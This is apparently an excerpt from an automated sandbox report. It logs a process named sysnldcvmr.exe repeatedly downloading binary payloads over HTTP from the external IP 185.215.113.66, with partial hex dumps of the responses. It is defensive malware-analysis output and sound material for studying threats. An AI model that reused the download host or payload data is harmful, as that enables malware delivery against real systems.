                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.706021070 CET1236INData Raw: 61 99 31 c2 26 77 3c 9e b9 8f ec d8 a9 2b 6e 6c c1 ef 6d 34 e7 d2 5c a8 68 3e 85 36 3f 6c cb 14 8b e4 50 7e 9f 27 e2 c3 82 8b 33 4f 7c 44 d7 48 48 6f dc b2 6a 43 61 04 96 2d 13 ea ab d5 3e 27 c1 bf ed 58 0b 63 08 45 dd 03 b8 67 a8 e3 50 66 00 df
                                                                                                                                                                                                                                                  Data Ascii: a1&w<+nlm4\h>6?lP~'3O|DHHojCa->'XcEgPfd~\ci].ss^*oHGby%<w/oF`l(WWNa0G%::PTBjbPK;]R`SeA!^|:9z!8TrnGO^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.706140995 CET308INData Raw: 03 db 51 0c 57 57 fe eb 8b 30 b8 70 d8 76 da b7 a1 e0 75 66 9a 7e 51 b6 be ff 5b 55 5a d5 6b fc 99 22 01 aa ef db 3b d2 d9 a7 67 36 e3 ed 93 8b c4 e5 f1 c0 d4 f6 12 77 6a c3 89 aa 49 e9 27 15 d7 83 69 5b 2b 8d 60 30 2e 71 a8 9d 3a 49 f5 24 44 f7
                                                                                                                                                                                                                                                  Data Ascii: QWW0pvuf~Q[UZk";g6wjI'i[+`0.q:I$Dy_}~G):oR`Og";h~K^oxXTir&D\?uTGmK>*clj_)<1zk:!_yuLFTI";gR


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  14192.168.2.1149912185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:58.976722956 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.283077955 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:00 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 10496
                                                                                                                                                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67154d18-2900"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.283107996 CET124INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.284604073 CET1236INData Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35
                                                                                                                                                                                                                                                  Data Ascii: *B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.284683943 CET1236INData Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65
                                                                                                                                                                                                                                                  Data Ascii: Ku"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.284697056 CET1236INData Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66
                                                                                                                                                                                                                                                  Data Ascii: >"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.284739971 CET372INData Raw: 31 a8 75 b5 61 82 75 bf 07 d4 ae 95 c4 56 90 7c cb 70 96 18 0f 8d 94 0d ed c5 38 19 fb 22 c5 0b 12 87 60 3b 81 03 12 75 54 3b 9d 5f 49 0f c9 02 17 62 6d e2 fe bb 70 70 d5 80 63 88 df db 26 ba b5 f0 ea 96 e1 99 44 8e de e9 03 08 35 cb 48 83 ae 43
                                                                                                                                                                                                                                                  Data Ascii: 1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6Y=z)}s
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.285693884 CET1236INData Raw: 97 93 05 44 ff df 37 26 13 b8 c0 69 cd d0 4d e7 a8 07 3a c0 b4 91 f1 c8 d0 9a 5f ec 8d 18 a9 e0 47 12 48 80 6b aa 97 64 8d 2a 55 44 06 66 4d b6 76 18 07 89 4a 5f bd 06 01 12 3b 50 b8 6b c2 df 39 e9 6e 6a 0e 54 e9 3a e6 ad 8c 84 c4 53 3b 37 aa 96
                                                                                                                                                                                                                                                  Data Ascii: D7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&q"Ka4tO>]=7PpVra;AyN<.O~`=]/1JEsW`T`D@);q5'Q
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.285747051 CET1236INData Raw: 07 3e 88 72 f1 4a fa 21 3b fb e2 1e 9e 3d 7f 77 4a 6f 8a 09 14 20 4f f5 68 09 fe f2 df 7a 11 bb 4f 3d 71 06 dc a1 7e 71 d3 e9 46 df a7 e2 b2 f8 f7 9e 2e 89 c8 ed 8a 84 42 74 68 df e8 5d 51 81 a6 0d 4c 3e e9 bd ed af 75 87 f1 d2 86 41 08 5a bd 13
                                                                                                                                                                                                                                                  Data Ascii: >rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKdPSmy"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.285758018 CET248INData Raw: 72 d1 c2 ba 68 f3 74 f6 c7 76 f4 e9 47 ea d4 1f d2 e2 2e 77 47 36 12 b0 6e 3d 2d c0 7a 09 e7 50 4b 2c 2c 6a 68 4d 92 ba 96 02 0e 52 44 20 bc 59 69 3d 38 9f 97 53 37 3d 11 d3 33 c3 a0 fd 52 9d e0 e8 5d ff 13 54 77 b3 5a a1 57 39 5e f2 c4 9d 68 78
                                                                                                                                                                                                                                                  Data Ascii: rhtvG.wG6n=-zPK,,jhMRD Yi=8S7=3R]TwZW9^hx``\vkU&lJuGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVT
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.286973000 CET1236INData Raw: 4d a1 d1 e7 27 05 b8 8e f4 9c 1d 95 99 e5 8c 61 b1 b2 98 8a 81 a4 59 8b c9 9a 08 ef 09 76 5f 8c fe 80 e6 77 ad 80 e9 26 d8 25 be 6b 87 19 22 2d 20 31 3f 33 75 6c a2 eb 32 ef 27 a4 4b 17 75 f1 73 04 32 85 17 e7 0f 29 03 a0 ea 5e 80 10 89 58 f6 ff
                                                                                                                                                                                                                                                  Data Ascii: M'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[!nlIonB1jg'|]w<OyfG%Wl'X2c _'v^]XtCP8&S*.OU@:`#45/
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:00.404052973 CET1236INData Raw: 6c 2b 0e 37 89 41 c1 51 1a 35 4a 27 0e 75 79 5e 19 ed a2 b8 58 ee 3d f8 ed 0a 54 b2 c3 da e0 3f a6 32 68 dd 96 90 56 1c 08 09 b7 0e 67 b7 90 96 70 6b 2c ef ea 20 91 ff ad 1b 52 5e 43 96 21 a5 a9 ad 6f b4 9f 4f f5 dc 13 8e cc f2 ed c9 2e d5 e0 5e
                                                                                                                                                                                                                                                  Data Ascii: l+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)pLl!LugJ:hL"@hNUoZwAFiA;O"GaTP;|6z:A78jGr|OXvf~ZCen.+B];k


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  15192.168.2.1149922185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:03.059560061 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.389373064 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:04 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 55040
                                                                                                                                                                                                                                                  Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674b357a-d700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" |%LB|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<|TwX?Fq)3Pr|\jFC4wa|zk9eT*G$IFxP!+*(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+|~z0g[:e2?zO*_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQ*chAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.389764071 CET124INData Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5
                                                                                                                                                                                                                                                  Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.390101910 CET1236INData Raw: 6c fe cd 45 55 b9 8c 37 fb e0 65 e2 c7 a6 e8 ca 2e e7 36 11 cb 44 07 75 cb 65 86 30 68 e9 80 ff a2 f2 50 8d 9f ef f0 d7 88 1a 9c d0 44 c8 07 20 87 df eb 5f aa 42 af 74 3b f3 0f c4 18 25 80 2a b4 f7 48 e6 5f 1a db a2 ab 62 43 40 ea 39 f6 86 e6 0a
                                                                                                                                                                                                                                                  Data Ascii: lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW|Sz#0#|)8_wo=`w9rvM$&qfkc];j`PWbOxH2me7q-kAqD_Pk
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.390147924 CET1236INData Raw: 7b 36 a6 49 ac 18 96 02 5c 26 ff 36 f8 c6 2f da 11 03 0b 43 42 d5 f1 fa 41 49 12 5f 6a f7 0d ab 9c 22 da 0e e6 73 5c a7 63 55 c5 7a be 68 9a 7b ab 24 23 8f b8 90 f1 46 3f dc 40 7f eb fc ff f9 de 79 f0 46 f0 1c bf c3 28 8f 7e 59 df 83 6b 13 f2 9e
                                                                                                                                                                                                                                                  Data Ascii: {6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#|;d!q?+y<ptwL(>qvj?}Ip9f&)ta/kkPSHD+$"S$>p\"}q@&}X~{4SSz99)T
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.390157938 CET248INData Raw: 7b c2 28 ec 12 68 73 af f0 35 fa 92 0d 6e d3 4c 18 d1 e8 8f c4 a1 15 0c 44 f9 b6 78 31 a0 fd 7f 79 99 72 c6 f0 73 47 e9 0f 40 94 99 fb e1 f0 b4 d5 8f 6d d3 2c 32 8b 19 0f 58 f0 2e 41 9c f2 6f 5b 46 89 a3 28 dc 95 c6 72 a2 e2 61 ac 48 43 c4 a9 bc
                                                                                                                                                                                                                                                  Data Ascii: {(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h+nLh-=-&vqSO@O<0gm:TtwnKmhmm@A>xa!@ZcI:#u
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.390888929 CET1236INData Raw: 19 a0 24 4b da 1e 29 2e b8 90 9c 19 04 be a0 c4 89 13 1c 0f aa 93 20 f3 19 9e b4 84 fb e1 14 78 a7 00 52 e2 02 4c b2 23 82 28 ac f5 b8 d9 a2 cf 34 a1 59 dc ee fd 95 3e 18 9b 64 03 51 58 ab bf d0 e1 e3 e5 36 f2 4d fe 5c 19 c0 e8 22 65 10 8a 26 7e
                                                                                                                                                                                                                                                  Data Ascii: $K). xRL#(4Y>dQX6M\"e&~,r7e>l=U-v"HPC|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.390949011 CET1236INData Raw: e3 c7 0b d2 07 66 a2 02 df 9b c5 ad ab 86 33 77 7c 85 cf 8e 02 e9 ff 0a 52 b6 86 0a 21 68 f0 58 ca f5 19 d1 1f 7e eb d9 06 ec 62 12 90 c3 a8 07 cc ab 65 62 96 7c 42 a0 c7 96 0d 36 40 4f ee 7a 37 4c 55 60 da 2d 0c 43 d9 ee 18 23 31 42 c0 08 0f e1
                                                                                                                                                                                                                                                  Data Ascii: f3w|R!hX~beb|B6@Oz7LU`-C#1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.390959024 CET248INData Raw: 8b f1 53 ed 23 89 32 81 6a bd ac 31 f6 9e 1b 21 44 9f d0 ec 52 3c e7 1c f1 5f 27 92 ba 55 b5 ac 17 95 c8 e8 2a 81 72 92 e4 d3 9b 75 7a 3a 81 3a 47 c0 9d 6e d4 bb 70 d3 d3 62 2d fc c9 2d a8 43 c5 85 d8 06 4b 95 4d 8f 6a a5 64 23 d1 2f ec 3d 2b 2c
                                                                                                                                                                                                                                                  Data Ascii: S#2j1!DR<_'U*ruz::Gnpb--CKMjd#/=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-d*CZ`p7(uiHd=)d3@<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.392635107 CET1236INData Raw: 17 43 81 f0 03 28 4e 24 a8 e2 3f 60 47 a1 6f 7b ec 56 d9 24 37 5a 16 c7 eb 35 dc 0e ed 65 da f8 49 f7 cc 2b 36 d8 0f 7d 66 42 a9 b8 85 ec bf 11 2a 77 a0 34 47 30 6f 7f 41 eb 96 c9 07 bc 08 47 23 99 e4 a4 6f f9 66 df 48 58 04 59 25 99 cb 97 2b f2
                                                                                                                                                                                                                                                  Data Ascii: C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#ofHXY%+CVFJq0`24NEEGWOI+3C^)^+KBSocNu\QlIj;vw(e7%3P8L97p,#0^4U[D.-Y
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.393243074 CET1236INData Raw: 5a ac 51 67 01 3a 92 a1 ff f7 16 2a 46 98 21 45 9c 86 aa 78 86 b6 91 f2 e4 79 5a 79 6c ff b8 36 11 0d 46 b5 28 67 4f 17 25 c6 46 1d f0 6e a1 5f 5c 30 a3 52 df 5f d9 a2 ad 4a ff 0f 95 c9 36 8d bf 83 c5 bf c8 e5 47 08 f9 e3 09 7d 86 8c 8b 98 db 6f
                                                                                                                                                                                                                                                  Data Ascii: ZQg:*F!ExyZyl6F(gO%Fn_\0R_J6G}oJ&bBypG`6~!!S'?`?\i#Y%3xZT/qU^bIn/n}JGG-vam2T5*a.v"[Fu#!D*
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:04.510375977 CET1236INData Raw: 0f b3 d3 05 79 4d 7a a8 6e 58 5a 01 53 d0 02 cb c3 2b 86 63 b6 7f 83 2e eb 0d 93 a1 9d ed 03 12 e4 de 0b d4 1f da f1 2b 75 78 ac 0d d8 d3 d1 37 d3 d4 f5 3d b8 11 26 a3 c7 da 52 4d 50 d2 ae 12 55 a0 a6 f8 4b e6 c8 f4 f8 85 9b 93 57 cb 3a 31 c6 52
                                                                                                                                                                                                                                                  Data Ascii: yMznXZS+c.+ux7=&RMPUKW:1RuY[?@b DYSC^b`a85+N="p-1j'`G$hixmdkeym8)|Sm*7Q%gDUw'P(+P{lC\q"b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  16192.168.2.1149933185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:06.690682888 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017703056 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:07 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 63232
                                                                                                                                                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67497f08-f700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017729044 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                                                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017740965 CET1236INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                                                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017751932 CET1236INData Raw: b3 14 96 cb 1c 0a 64 65 9f 17 1d 52 f9 ae 09 c2 59 f9 97 5b 06 44 1f 60 d5 dc 83 2e 98 cf df f1 08 5d 1d 36 10 63 69 37 f3 11 47 73 c1 1c ec 75 9f a3 5e 11 a4 d3 cd 83 6a 32 cd da 5f a2 80 b4 0b 03 1e 6e e5 80 35 9f 8f 49 86 b6 da c7 ab 4e 6a ba
                                                                                                                                                                                                                                                  Data Ascii: deRY[D`.]6ci7Gsu^j2_n5INj.`/#(W{[uhRfdy6z[$PzqmAEH]6t:FvqlDFT|JG9_,l{!G6eMqP_d
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:08.017764091 CET1236INData Raw: 6d 0d 07 a8 a1 69 a5 5a 9f 67 bb a2 b3 a3 1a 7b df b0 97 3e 9f 20 d8 e2 0f 63 0c 38 c6 ce 9e b0 77 92 c6 65 37 7a e5 0d a5 58 6c cb b5 27 81 75 a6 c5 28 35 e5 3c c3 09 59 f7 dd 4d 9e 8b b5 64 6b e3 1f 4d ed 5b 6c 04 4e ae 54 c3 03 55 4a 4f 76 43
                                                                                                                                                                                                                                                  Data Ascii: miZg{> c8we7zXl'u(5<YMdkM[lNTUJOvCS\u#~z;}#+!%vk@E}rOFmbiVo(s<^]G,:\iLnc\.+#sE@-# ltx5=oPZr
